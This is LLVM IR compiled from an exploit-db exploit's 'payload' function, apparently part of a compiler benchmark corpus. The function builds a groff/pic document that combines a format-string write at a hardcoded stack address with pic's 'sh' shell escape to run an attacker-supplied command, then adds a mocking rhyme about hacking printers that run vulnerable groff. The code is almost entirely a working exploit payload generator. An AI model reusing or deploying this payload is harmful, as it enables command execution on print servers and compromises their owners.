; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/linux/remote/extr_21037.c_payload.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/linux/remote/extr_21037.c_payload.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@.str = private unnamed_addr constant [5 x i8] c".PS\0A\00", align 1
@.str.1 = private unnamed_addr constant [19 x i8] c"plot %5.20f \22%%n\22\0A\00", align 1
@.str.2 = private unnamed_addr constant [9 x i8] c"sh X%sX\0A\00", align 1
@.str.3 = private unnamed_addr constant [5 x i8] c".PE\0A\00", align 1
@.str.4 = private unnamed_addr constant [38 x i8] c"This is the way we hack the printer,\0A\00", align 1
@.str.5 = private unnamed_addr constant [37 x i8] c"Hack the printer, hack the printer.\0A\00", align 1
@.str.6 = private unnamed_addr constant [44 x i8] c"when they are running a vulnerable version\0A\00", align 1
@.str.7 = private unnamed_addr constant [11 x i8] c"of groff.\0A\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i8* @payload(i8* %0, i32 %1) #0 {
  %3 = alloca i8*, align 8
  %4 = alloca i32, align 4
  %5 = alloca i8*, align 8
  %6 = alloca i8*, align 8
  store i8* %0, i8** %3, align 8
  store i32 %1, i32* %4, align 4
  %7 = call i64 @malloc(i32 4096)
  %8 = inttoptr i64 %7 to i8*
  store i8* %8, i8** %5, align 8
  %9 = load i8*, i8** %5, align 8
  %10 = call i32 (i8*, i8*, ...) @sprintf(i8* %9, i8* getelementptr inbounds ([5 x i8], [5 x i8]* @.str, i64 0, i64 0))
  %11 = load i8*, i8** %5, align 8
  %12 = call i8* @eos(i8* %11)
  store i8* %12, i8** %6, align 8
  %13 = load i8*, i8** %6, align 8
  %14 = load i32, i32* %4, align 4
  %15 = call i32 (i8*, i8*, ...) @sprintf(i8* %13, i8* getelementptr inbounds ([19 x i8], [19 x i8]* @.str.1, i64 0, i64 0), i32 %14, i32 -1073743352)
  %16 = load i8*, i8** %5, align 8
  %17 = call i8* @eos(i8* %16)
  store i8* %17, i8** %6, align 8
  %18 = load i8*, i8** %6, align 8
  %19 = load i8*, i8** %3, align 8
  %20 = call i32 (i8*, i8*, ...) @sprintf(i8* %18, i8* getelementptr inbounds ([9 x i8], [9 x i8]* @.str.2, i64 0, i64 0), i8* %19)
  %21 = load i8*, i8** %5, align 8
  %22 = call i8* @eos(i8* %21)
  store i8* %22, i8** %6, align 8
  %23 = load i8*, i8** %6, align 8
  %24 = call i32 (i8*, i8*, ...) @sprintf(i8* %23, i8* getelementptr inbounds ([5 x i8], [5 x i8]* @.str.3, i64 0, i64 0))
  %25 = load i8*, i8** %5, align 8
  %26 = call i8* @eos(i8* %25)
  store i8* %26, i8** %6, align 8
  %27 = load i8*, i8** %6, align 8
  %28 = call i32 (i8*, i8*, ...) @sprintf(i8* %27, i8* getelementptr inbounds ([38 x i8], [38 x i8]* @.str.4, i64 0, i64 0))
  %29 = load i8*, i8** %5, align 8
  %30 = call i8* @eos(i8* %29)
  store i8* %30, i8** %6, align 8
  %31 = load i8*, i8** %6, align 8
  %32 = call i32 (i8*, i8*, ...) @sprintf(i8* %31, i8* getelementptr inbounds ([37 x i8], [37 x i8]* @.str.5, i64 0, i64 0))
  %33 = load i8*, i8** %5, align 8
  %34 = call i8* @eos(i8* %33)
  store i8* %34, i8** %6, align 8
  %35 = load i8*, i8** %6, align 8
  %36 = call i32 (i8*, i8*, ...) @sprintf(i8* %35, i8* getelementptr inbounds ([38 x i8], [38 x i8]* @.str.4, i64 0, i64 0))
  %37 = load i8*, i8** %5, align 8
  %38 = call i8* @eos(i8* %37)
  store i8* %38, i8** %6, align 8
  %39 = load i8*, i8** %6, align 8
  %40 = call i32 (i8*, i8*, ...) @sprintf(i8* %39, i8* getelementptr inbounds ([44 x i8], [44 x i8]* @.str.6, i64 0, i64 0))
  %41 = load i8*, i8** %5, align 8
  %42 = call i8* @eos(i8* %41)
  store i8* %42, i8** %6, align 8
  %43 = load i8*, i8** %6, align 8
  %44 = call i32 (i8*, i8*, ...) @sprintf(i8* %43, i8* getelementptr inbounds ([11 x i8], [11 x i8]* @.str.7, i64 0, i64 0))
  %45 = load i8*, i8** %5, align 8
  %46 = call i8* @eos(i8* %45)
  store i8* %46, i8** %6, align 8
  %47 = load i8*, i8** %5, align 8
  ret i8* %47
}

declare dso_local i64 @malloc(i32) #1

declare dso_local i32 @sprintf(i8*, i8*, ...) #1

declare dso_local i8* @eos(i8*) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
